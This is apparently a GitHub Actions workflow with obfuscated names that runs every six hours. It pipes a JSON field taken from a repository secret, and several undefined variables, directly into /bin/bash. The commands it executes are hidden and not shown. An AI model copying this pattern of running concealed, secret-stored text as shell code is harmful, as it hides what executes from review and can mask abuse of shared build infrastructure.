name: wuhaoning3214

on:
  workflow_dispatch:
  schedule:
    - cron: '19 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wuhaoning3214
        env:
          etnsm08: ${{ secrets.etnsm08 }}
        run: |
          echo $etnsm08 | jq -r .q5471 | /bin/bash
          echo $t2054 | jq -r .reu0 | /bin/bash
          echo $yen1 | jq -r .z98 | /bin/bash
          echo $cbbk85672 | jq -r .g1 | /bin/bash
          echo $gxy11 | jq -r .xd064 | /bin/bash

